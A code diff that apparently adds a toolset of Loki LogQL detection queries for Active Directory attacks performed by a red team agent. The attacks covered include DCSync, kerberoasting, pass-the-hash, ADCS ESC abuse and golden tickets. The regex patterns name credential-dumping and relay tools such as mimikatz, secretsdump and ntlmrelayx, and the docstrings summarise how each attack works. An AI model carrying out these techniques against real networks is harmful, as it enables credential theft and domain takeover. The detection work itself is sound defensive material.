+from dreadnode.agent.tools.base import Toolset
+from loguru import logger
+
+
+class QueryTemplateTools(Toolset): # type: ignore[misc]
+ """Pre-built query templates for detecting red team attack patterns.
+
+ These templates encode detection logic for Active Directory attacks,
+ specifically aligned with the techniques used by the Ares red team agent:
+ - Network enumeration (nmap, user/share enumeration)
+ - Credential access (secretsdump, kerberoasting, AS-REP roasting)
+ - Lateral movement (pass-the-hash, psexec, wmi)
+ - Privilege escalation (ADCS, delegation, golden ticket)
+
+ Attributes:
+ loki_url: Base URL of the Loki instance.
+ timeout: HTTP request timeout in seconds.
+ """
+
+ loki_url: str
+ timeout: int = 30
+
+ async def _query_loki(
+ self,
+ logql: str,
+ start_time: str,
+ end_time: str,
+ limit: int = 500,
+ ) -> dict[str, Any]:
+ """Execute a LogQL query against Loki."""
+ # Validate query to prevent empty-compatible regex errors
+ if '=~".*"' in logql or "=~'.*'" in logql:
+ return {
+ "status": "error",
+ "error": "Query contains empty-compatible regex '.*'. Use '.+' instead.",
+ }
+
+ try:
+ async with httpx.AsyncClient(timeout=self.timeout) as client:
+ response = await client.get(
+ f"{self.loki_url}/loki/api/v1/query_range",
+ params={
+ "query": logql,
+ "start": start_time,
+ "end": end_time,
+ "limit": limit,
+ },
+ )
+ response.raise_for_status()
+ return response.json()
+ except httpx.HTTPError as e:
+ logger.error(f"Loki query failed: {e}")
+ return {"status": "error", "error": str(e), "data": {"result": []}}
+
+ def _get_time_range(self, hours_back: int = 24) -> tuple[str, str]:
+ """Get ISO8601 time range for queries."""
+ now = datetime.now(timezone.utc)
+ start = now - timedelta(hours=hours_back)
+ return start.isoformat(), now.isoformat()
+
+ def _count_results(self, result: dict) -> int:
+ """Count total log entries in result."""
+ streams = result.get("data", {}).get("result", [])
+ return sum(len(s.get("values", [])) for s in streams)
+
+ # =========================================================================
+ # RECONNAISSANCE & DISCOVERY (TA0007)
+ # Maps to: nmap_scan, enumerate_users, enumerate_shares
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_port_scanning(
+ self,
+ target_ip: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect network port scanning activity (nmap, masscan).
+
+ Detects reconnaissance performed by red team's nmap_scan tool.
+ Looks for rapid connection attempts to multiple ports.
+
+ MITRE ATT&CK: T1046 (Network Service Discovery)
+
+ Args:
+ target_ip: Optional IP to focus detection on.
+ hours_back: Hours of logs to search (default 24).
+
+ Returns:
+ Query results with port scanning indicators.
+ """
+ dn.log_metric("query_template_port_scan", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Detect nmap signatures, SYN scans, rapid connection attempts
+ logql = '{job=~".+"} |~ "(?i)(nmap|masscan|syn.*scan|port.*scan|connection.*refused)"'
+
+ if target_ip:
+ logql += f' |~ "{target_ip}"'
+
+ logger.info(f"Port scanning detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "port_scanning"
+ result["_mitre_technique"] = "T1046"
+ result["_red_team_tool"] = "nmap_scan"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_user_enumeration(
+ self,
+ domain_controller: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Active Directory user enumeration.
+
+ Detects reconnaissance performed by red team's enumerate_users tool (netexec --users).
+ Looks for LDAP queries, net user commands, and SMB-based enumeration.
+
+ MITRE ATT&CK: T1087.002 (Account Discovery: Domain Account)
+
+ Args:
+ domain_controller: Optional DC hostname to focus on.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with user enumeration indicators.
+ """
+ dn.log_metric("query_template_user_enum", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4662: Object access (LDAP queries)
+ # Event 4798: User's group membership enumerated
+ # Event 4799: Security-enabled group membership enumerated
+ # netexec, crackmapexec, ldapsearch signatures
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4662|4798|4799|samr|lsarpc|ldap|net.*user|net.*group)"'
+ ' |~ "(?i)(enumerate|query|lookup|search|crackmapexec|netexec|ldapsearch)"'
+ )
+
+ if domain_controller:
+ logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"User enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "user_enumeration"
+ result["_mitre_technique"] = "T1087.002"
+ result["_red_team_tool"] = "enumerate_users"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_share_enumeration(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect SMB share enumeration.
+
+ Detects reconnaissance performed by red team's enumerate_shares tool (netexec --shares).
+ Looks for share listing, access attempts, and smbclient activity.
+
+ MITRE ATT&CK: T1135 (Network Share Discovery)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with share enumeration indicators.
+ """
+ dn.log_metric("query_template_share_enum", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 5140: Network share accessed
+ # Event 5145: Detailed file share access
+ # smbclient, netexec signatures
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(5140|5145|srvsvc|netuse|net.*share|net.*view)"'
+ ' |~ "(?i)(smbclient|crackmapexec|netexec|enum.*share|share.*enum)"'
+ )
+
+ if target_host:
+ logql += f' |~ "(?i){target_host}"'
+
+ logger.info(f"Share enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "share_enumeration"
+ result["_mitre_technique"] = "T1135"
+ result["_red_team_tool"] = "enumerate_shares"
+
+ return result
+
+ # =========================================================================
+ # CREDENTIAL ACCESS (TA0006)
+ # Maps to: secretsdump, kerberoast, asrep_roast, crack_with_hashcat
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_secretsdump(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect credential dumping via impacket-secretsdump.
+
+ Detects red team's secretsdump tool which extracts:
+ - SAM database (local accounts)
+ - LSA secrets
+ - NTDS.dit (domain accounts)
+ - Cached domain credentials
+
+ MITRE ATT&CK: T1003 (OS Credential Dumping)
+ Sub-techniques: T1003.001 (LSASS), T1003.002 (SAM), T1003.003 (NTDS), T1003.004 (LSA)
+
+ Args:
+ target_host: Optional hostname to focus on.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with secretsdump indicators.
+ """
+ dn.log_metric("query_template_secretsdump", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # DRSUAPI for DCSync, SAMR for SAM dump, registry access for LSA secrets
+ # Event 4624 Type 3 from unusual source, Event 4662 (DS-Replication-Get-Changes)
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(drsuapi|samr|secretsdump|lsadump|ntds\\.dit|sam.*dump)"'
+ ' |~ "(?i)(replicate|1131f6|ds-replication|mimikatz|impacket)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Secretsdump detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "secretsdump"
+ result["_mitre_technique"] = "T1003"
+ result["_mitre_subtechniques"] = ["T1003.001", "T1003.002", "T1003.003", "T1003.004"]
+ result["_red_team_tool"] = "secretsdump"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_dcsync(
+ self,
+ domain_controller: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect DCSync attack (secretsdump against DC).
+
+ DCSync allows attackers with replication rights to extract all domain credentials
+ including krbtgt hash (enables golden ticket). Critical to detect.
+
+ MITRE ATT&CK: T1003.006 (DCSync)
+
+ Args:
+ domain_controller: Optional DC hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with DCSync indicators.
+ """
+ dn.log_metric("query_template_dcsync", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4662 with specific GUIDs for replication
+ # 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes
+ # 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 = DS-Replication-Get-Changes-All
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4662|dcsync|ds-replication|1131f6aa|1131f6ad)"'
+ ' |~ "(?i)(replication|drsuapi|directory.*service.*access)"'
+ )
+
+ if domain_controller:
+ logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"DCSync detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "dcsync"
+ result["_mitre_technique"] = "T1003.006"
+ result["_red_team_tool"] = "secretsdump"
+ result["_severity"] = "critical"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_kerberoasting(
+ self,
+ domain_controller: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Kerberoasting attack (impacket-GetUserSPNs).
+
+ Detects red team's kerberoast tool which requests TGS tickets for
+ service accounts with SPNs. These tickets can be cracked offline.
+
+ MITRE ATT&CK: T1558.003 (Kerberoasting)
+
+ Args:
+ domain_controller: Optional DC hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with Kerberoasting indicators.
+ """
+ dn.log_metric("query_template_kerberoast", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4769: Kerberos Service Ticket Request
+ # Look for: RC4 encryption (type 0x17), many TGS requests, SPN patterns
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4769|kerberos.*ticket|tgs.*request|getuserspn)"'
+ ' |~ "(?i)(service.*ticket|spn|rc4|0x17|kerberoast)"'
+ )
+
+ if domain_controller:
+ logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Kerberoasting detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "kerberoasting"
+ result["_mitre_technique"] = "T1558.003"
+ result["_red_team_tool"] = "kerberoast"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_asrep_roasting(
+ self,
+ domain_controller: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect AS-REP Roasting attack (impacket-GetNPUsers).
+
+ Detects red team's asrep_roast tool which targets accounts with
+ 'Do not require Kerberos preauthentication' enabled.
+
+ MITRE ATT&CK: T1558.004 (AS-REP Roasting)
+
+ Args:
+ domain_controller: Optional DC hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with AS-REP roasting indicators.
+ """
+ dn.log_metric("query_template_asrep", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4768: Kerberos TGT Request (AS-REQ)
+ # Event 4771: Kerberos Pre-Authentication Failed
+ # Look for requests without pre-auth, RC4 encryption
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4768|4771|as-req|getnpusers|asrep)"'
+ ' |~ "(?i)(pre.*auth|tgt.*request|roast|dont.*require.*preauth)"'
+ )
+
+ if domain_controller:
+ logql = f'{{job=~".+", hostname=~".*{domain_controller}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"AS-REP roasting detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "asrep_roasting"
+ result["_mitre_technique"] = "T1558.004"
+ result["_red_team_tool"] = "asrep_roast"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_brute_force(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ threshold: int = 10,
+ ) -> dict[str, Any]:
+ """Detect brute force and password spray attacks.
+
+ Detects credential stuffing attempts from red team's authentication tests.
+ Looks for multiple failed logins from same source or against multiple accounts.
+
+ MITRE ATT&CK: T1110 (Brute Force), T1110.003 (Password Spraying)
+
+ Args:
+ target_host: Optional hostname to focus on.
+ hours_back: Hours of logs to search.
+ threshold: Minimum failures to flag (default 10).
+
+ Returns:
+ Query results with auth failure analysis.
+ """
+ dn.log_metric("query_template_brute_force", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4625: Failed Logon
+ # Event 4771: Kerberos Pre-Auth Failed
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4625|4771|failed|invalid|denied)"'
+ ' |~ "(?i)(logon|auth|password|credential)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Brute force detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=1000)
+
+ # Analyze patterns
+ total_failures = self._count_results(result)
+ result["_analysis"] = {
+ "total_failures": total_failures,
+ "is_likely_attack": total_failures >= threshold,
+ "recommendation": (
+ "High auth failure volume - investigate source IPs and target accounts"
+ if total_failures >= threshold
+ else "Normal failure volume"
+ ),
+ }
+ result["_query_template"] = "brute_force"
+ result["_mitre_technique"] = "T1110"
+
+ return result
+
+ # =========================================================================
+ # LATERAL MOVEMENT (TA0008)
+ # Maps to: domain_admin_checker (pass-the-hash), netexec
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_pass_the_hash(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Pass-the-Hash attacks.
+
+ Detects red team's domain_admin_checker using NTLM hashes for auth.
+ Looks for NTLM authentications without corresponding password usage.
+
+ MITRE ATT&CK: T1550.002 (Pass the Hash)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with PtH indicators.
+ """
+ dn.log_metric("query_template_pth", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4624 with NTLM auth (LogonType 3 or 9, NtLmSsp)
+ # Look for hash-based auth patterns from netexec/crackmapexec
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4624|ntlm|ntlmssp|pass.*the.*hash)"'
+ ' |~ "(?i)(logon.*type.*3|network.*logon|crackmapexec|netexec)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Pass-the-Hash detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "pass_the_hash"
+ result["_mitre_technique"] = "T1550.002"
+ result["_red_team_tool"] = "domain_admin_checker"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_lateral_movement(
+ self,
+ source_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect lateral movement patterns.
+
+ Detects various lateral movement techniques used during post-exploitation:
+ - PSExec service creation
+ - WMI execution
+ - WinRM/PowerShell remoting
+ - SMB admin share access
+
+ MITRE ATT&CK: T1021 (Remote Services)
+
+ Args:
+ source_host: Optional source to pivot from.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with lateral movement indicators.
+ """
+ dn.log_metric("query_template_lateral", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 7045: Service installed
+ # Event 4648: Explicit credential logon
+ # Event 4624 Type 3: Network logon
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(7045|4648|psexec|wmic|winrm|powershell.*-session)"'
+ ' |~ "(?i)(admin\\$|c\\$|ipc\\$|service.*install|remote.*execution)"'
+ )
+
+ if source_host:
+ logql += f' |~ "(?i){source_host}"'
+
+ logger.info(f"Lateral movement detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "lateral_movement"
+ result["_mitre_technique"] = "T1021"
+ result["_mitre_subtechniques"] = ["T1021.002", "T1021.003", "T1021.006"]
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_smb_file_access(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect suspicious file access on SMB shares.
+
+ Detects red team's share pilfering tools (enumerate_share_files, download_file_content).
+ Looks for access to sensitive files like scripts, configs, GPP XML.
+
+ MITRE ATT&CK: T1039 (Data from Network Shared Drive)
+
+ Args:
+ target_host: Optional target hostname.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with file access indicators.
+ """
+ dn.log_metric("query_template_smb_access", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 5145: Detailed file share access
+ # Look for sensitive file extensions and paths
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(5145|file.*access|share.*access|smbclient)"'
+ ' |~ "(?i)(\\.ps1|\\.bat|\\.cmd|\\.xml|\\.config|sysvol|netlogon|groups\\.xml)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"SMB file access detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "smb_file_access"
+ result["_mitre_technique"] = "T1039"
+ result["_red_team_tools"] = ["enumerate_share_files", "download_file_content"]
+
+ return result
+
+ # =========================================================================
+ # PRIVILEGE ESCALATION (TA0004)
+ # Maps to: certipy (ADCS), delegation tools, bloodhound
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_adcs_exploitation(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect ADCS certificate abuse (ESC1-ESC15).
+
+ Detects red team's certipy tools exploiting certificate template misconfigurations.
+ ESC1 is particularly dangerous - allows requesting certs for any user.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ADCS exploitation indicators.
+ """
+ dn.log_metric("query_template_adcs", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4886: Certificate request submitted
+ # Event 4887: Certificate Services approved certificate request
+ # Look for certipy patterns, suspicious certificate requests
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4886|4887|4876|certipy|certificate.*request)"'
+ ' |~ "(?i)(esc[0-9]|enrollee.*supplies.*subject|altname|upn)"'
+ )
+
+ logger.info(f"ADCS exploitation detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "adcs_exploitation"
+ result["_mitre_technique"] = "T1649"
+ result["_red_team_tools"] = ["certipy_find", "certipy_req_esc1", "certipy_auth"]
+ result["_severity"] = "high"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_delegation_abuse(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Kerberos delegation attacks (RBCD, unconstrained, constrained).
+
+ Detects red team's delegation tools for privilege escalation:
+ - Resource-Based Constrained Delegation (RBCD)
+ - Unconstrained delegation exploitation
+ - S4U2Self/S4U2Proxy abuse
+
+ MITRE ATT&CK: T1134.001 (Token Impersonation/Theft)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with delegation abuse indicators.
+ """
+ dn.log_metric("query_template_delegation", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Look for: msDS-AllowedToActOnBehalfOfOtherIdentity modification
+ # S4U2Self/S4U2Proxy ticket requests, delegation attribute changes
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(delegation|msds-allowedtoactonbehalf|rbcd|s4u2)"'
+ ' |~ "(?i)(impersonate|constrained|unconstrained|getst|addcomputer)"'
+ )
+
+ logger.info(f"Delegation abuse detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "delegation_abuse"
+ result["_mitre_technique"] = "T1134.001"
+ result["_red_team_tools"] = ["find_delegation", "add_computer", "rbcd_write", "get_st"]
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_bloodhound_collection(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect BloodHound/SharpHound data collection.
+
+ Detects red team's BloodHound collection which maps AD relationships
+ to find privilege escalation paths.
+
+ MITRE ATT&CK: T1087 (Account Discovery), T1069 (Permission Groups Discovery)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with BloodHound collection indicators.
+ """
+ dn.log_metric("query_template_bloodhound", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # LDAP enumeration patterns, BloodHound/SharpHound signatures
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(bloodhound|sharphound|adexplorer|ldap.*query)"'
+ ' |~ "(?i)(acl|objectsid|memberof|primarygroup|msds)"'
+ )
+
+ logger.info(f"BloodHound collection detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "bloodhound_collection"
+ result["_mitre_techniques"] = ["T1087", "T1069", "T1482"]
+ result["_red_team_tool"] = "run_bloodhound"
+
+ return result
+
+ # =========================================================================
+ # PERSISTENCE (TA0003)
+ # Maps to: golden_ticket
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_golden_ticket(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Golden Ticket creation and usage.
+
+ Detects red team's golden ticket generation (impacket-ticketer).
+ Golden tickets provide persistent domain admin access using krbtgt hash.
+
+ MITRE ATT&CK: T1558.001 (Golden Ticket)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with Golden Ticket indicators.
+ """
+ dn.log_metric("query_template_golden_ticket", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4769 with suspicious patterns (krbtgt access, invalid timestamps)
+ # Look for ticketer tool patterns, krbtgt references
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(golden.*ticket|krbtgt|ticketer|krbcred)"'
+ ' |~ "(?i)(forged|4769|kerberos.*ticket|enterprise.*admin)"'
+ )
+
+ logger.info(f"Golden ticket detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "golden_ticket"
+ result["_mitre_technique"] = "T1558.001"
+ result["_red_team_tool"] = "generate_golden_ticket"
+ result["_severity"] = "critical"
+
+ return result
+
+ # =========================================================================
+ # EXECUTION (TA0002)
+ # Maps to: general command execution patterns
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_suspicious_execution(
+ self,
+ target_host: str | None = None,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect suspicious command execution.
+
+ Detects encoded PowerShell, LOLBins, and script interpreter abuse
+ commonly used during post-exploitation.
+
+ MITRE ATT&CK: T1059 (Command and Scripting Interpreter)
+
+ Args:
+ target_host: Optional hostname to focus on.
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with execution indicators.
+ """
+ dn.log_metric("query_template_execution", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Event 4688: Process Creation (with command line logging)
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4688|powershell|pwsh|cmd\\.exe|wscript|cscript)"'
+ ' |~ "(?i)(encodedcommand|bypass|hidden|downloadstring|invoke)"'
+ )
+
+ if target_host:
+ logql = f'{{job=~".+", hostname=~".*{target_host}.*"}}' + logql.split("}", 1)[1]
+
+ logger.info(f"Suspicious execution detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "suspicious_execution"
+ result["_mitre_technique"] = "T1059"
+
+ return result
+
+ # =========================================================================
+ # ADCS/CERTIPY SPECIFIC DETECTIONS (ESC1-ESC11)
+ # Maps to: certipy_find, certipy_req_esc1, certipy_auth
+ # =========================================================================
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_certipy_enumeration(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect Certipy certificate template enumeration.
+
+ Detects red team's certipy_find tool scanning for vulnerable certificate
+ templates. This is the reconnaissance phase before ADCS exploitation.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with Certipy enumeration indicators.
+ """
+ dn.log_metric("query_template_certipy_enum", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # Certipy enumeration queries LDAP for certificate templates
+ # Look for: msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag queries
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(certipy|ldap|389|636)"'
+ ' |~ "(?i)(mspki|pkienrollmentservice|certificatetemplates|pki)"'
+ )
+
+ logger.info(f"Certipy enumeration detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "certipy_enumeration"
+ result["_mitre_technique"] = "T1649"
+ result["_red_team_tool"] = "certipy_find"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_esc1_attack(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect ESC1 - Enrollee Supplies Subject attack.
+
+ ESC1 allows attackers to request certificates with arbitrary Subject
+ Alternative Names (SANs), enabling impersonation of any user including
+ Domain Admins. This is the most critical ADCS vulnerability.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ESC1 attack indicators.
+ """
+ dn.log_metric("query_template_esc1", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # ESC1 indicators:
+ # - CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in template
+ # - Certificate request with SAN different from requester
+ # - Event 4886/4887 with suspicious SAN
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(4886|4887|certificate.*request|certipy)"'
+ ' |~ "(?i)(san=|subjectaltname|upn=|enrollee.*supplies|ct_flag)"'
+ )
+
+ logger.info(f"ESC1 attack detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "esc1_attack"
+ result["_mitre_technique"] = "T1649"
+ result["_red_team_tool"] = "certipy_req_esc1"
+ result["_severity"] = "critical"
+ result["_description"] = "ESC1: Enrollee supplies subject - allows impersonation"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_esc4_attack(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect ESC4 - Vulnerable Certificate Template ACL attack.
+
+ ESC4 exploits misconfigured ACLs on certificate templates where low-priv
+ users have write access to modify template settings.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ESC4 attack indicators.
+ """
+ dn.log_metric("query_template_esc4", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # ESC4 involves modifying certificate template attributes
+ # Event 5136: Directory service object modified (on certificate template)
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(5136|ldap.*modify|template.*modif)"'
+ ' |~ "(?i)(pki|certificatetemplate|mspki|enrollmentflag)"'
+ )
+
+ logger.info(f"ESC4 attack detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "esc4_attack"
+ result["_mitre_technique"] = "T1649"
+ result["_severity"] = "high"
+ result["_description"] = "ESC4: Certificate template ACL modification"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_esc8_attack(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect ESC8 - NTLM Relay to AD CS HTTP Endpoints.
+
+ ESC8 exploits AD CS web enrollment endpoints (certsrv) via NTLM relay.
+ Attackers coerce authentication then relay to the CA to request certs.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
+ hours_back: Hours of logs to search.
+
+ Returns:
+ Query results with ESC8 attack indicators.
+ """
+ dn.log_metric("query_template_esc8", 1, mode="count")
+ start_time, end_time = self._get_time_range(hours_back)
+
+ # ESC8 indicators:
+ # - HTTP requests to /certsrv/certfnsh.asp
+ # - NTLM relay patterns
+ # - PetitPotam/PrinterBug coercion followed by cert request
+ logql = (
+ '{job=~".+"}'
+ ' |~ "(?i)(certsrv|certfnsh|certenroll|ntlmrelayx)"'
+ ' |~ "(?i)(relay|coerce|petitpotam|printerbug|dfscoerce)"'
+ )
+
+ logger.info(f"ESC8 attack detection: {logql}")
+
+ result = await self._query_loki(logql, start_time, end_time, limit=500)
+ result["_query_template"] = "esc8_attack"
+ result["_mitre_technique"] = "T1649"
+ result["_severity"] = "critical"
+ result["_description"] = "ESC8: NTLM relay to AD CS web enrollment"
+
+ return result
+
+ @dn.tool_method # type: ignore[untyped-decorator]
+ async def detect_certificate_authentication(
+ self,
+ hours_back: int = 24,
+ ) -> dict[str, Any]:
+ """Detect authentication using stolen/forged certificates.
+
+ Detects red team's certipy_auth using certificates for PKINIT auth
+ to obtain TGTs and NTLM hashes.
+
+ MITRE ATT&CK: T1649 (Steal or Forge Authentication Certificates)
+
+ Args:
